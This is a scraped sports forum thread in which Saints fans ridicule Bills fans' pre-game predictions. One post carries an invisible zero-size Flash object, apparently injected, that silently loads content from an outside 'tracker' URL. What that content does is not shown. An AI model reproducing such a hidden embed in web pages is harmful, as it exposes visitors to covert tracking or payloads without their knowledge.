According to Bill's fans (1 Viewer)

Apparently our prevent defense sucks because it gives up so many yardage. Who would have thunk it?

CrazyBillsFan said:
The Saints offensive is not as brilliant as advertised. Still brilliant, but the three picks per game stat makes the Saints look better than the Bills in the early 90s, the Rams in 1999-2001, and the Patriots of 2007.

Bwahahahaaa :smilielol:!!!

Apparently our prevent defense sucks because it gives up so many yardage. Who would have thunk it?<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4730"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4730" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Too bad we only play prevent when our offense drops 40 on ya!

I like how everyone's solution to us is "if we can contain their offense, we should win this one easily". You think? That's all it takes? JUST contain our offense! These guys should be coaches.

Every team's fans will have similar things to say this year prior to facing the Saints. It's their team, they want their team to win and will try to find all of the positives they can find.

But AFTER they play the Saints, they'll be finding all of the excuses as to why the loss wasn't as bad as the final score indicated.

Get used to phrases like "It wasn't REALLY a blowout. I mean, sure we lost by 26 but we were in the game for the most part" and "If we hadn't thrown 5 picks, we'd have won" and "We almost sacked Brees, if we could have sacked him 5-12 times, we'd have won."

The one guy with sense:

So we give up 300 yards and 3 TDs to Byron Leftwich, without his #1 receiver and allow him to spread the ball around to 9 different players and we think our pass D can hang with Drew Brees and the Saints?? Oh and wait I forgot, Mckelvin is most likely out as well, so we are down one of our best players on D as well.

The one guy with sense:

So we give up 300 yards and 3 TDs to Byron Leftwich, without his #1 receiver and allow him to spread the ball around to 9 different players and we think our pass D can hang with Drew Brees and the Saints?? Oh and wait I forgot, Mckelvin is most likely out as well, so we are down one of our best players on D as well.

Sense is good :9:

I like how our defense is somehow "allowing 24.5 points a game"

huh?

I can't really blame them for not knowing much about our team. honestly i don't know that much about thiers, certainly not enough to make broad sweeping statements like "thier D is garbage". The difference is i'm smart enough not to make said broad sweeping statements...

This will be the talk every week, and it's only going to get worse with continued success and media coverage. Defenses are going to get tired of hearing about Brees this & that, Payton this, playcalling that, added a solid rushing attack, whatever, blah, blah, blah. Think about it, we play both the Jets and Giants - Rex Ryan has already said that they will continue to talk before games, like they did about New England (that matchup in two weeks is shaping up to be a good one BTW). You know the Giants defense doesn't want to hear it either because of the respect they have across the league. Get ready for a lot of trash talking and insults hurled our way. Me love it. :17:

Someone cue up that Samuel L. Jackson quote from Pulp fiction because Brees is about to strike down upon them with a most furious vengence and anger and they will know his name is the lord.

The one guy with sense:

This is exactly what I was thinking. They think Leftwich put a hurting on their pass D, just wait till they get a taste of Master Brees

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Already have an account? Log in here.

Users who are viewing this thread

Back
    Top Bottom